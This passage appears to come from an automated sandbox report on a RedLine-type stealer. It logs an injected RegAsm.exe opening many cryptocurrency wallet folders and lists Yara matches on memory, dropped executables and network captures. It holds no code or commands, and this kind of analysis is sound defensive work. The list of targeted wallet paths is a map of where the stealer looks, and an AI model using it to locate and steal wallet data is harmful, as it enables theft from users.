Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: Yara match File source: 00000003.00000002.2042222099.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7056, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 9.0.CAFIJKFHIJ.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft123[1].exe, type: DROPPED
Source: Yara match File source: C:\ProgramData\CAFIJKFHIJ.exe, type: DROPPED
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1632010609.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe PID: 6016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7056, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C9E0C40 sqlite3_bind_zeroblob, 3_2_6C9E0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C9E0D60 sqlite3_bind_parameter_name, 3_2_6C9E0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C908EA0 sqlite3_clear_bindings, 3_2_6C908EA0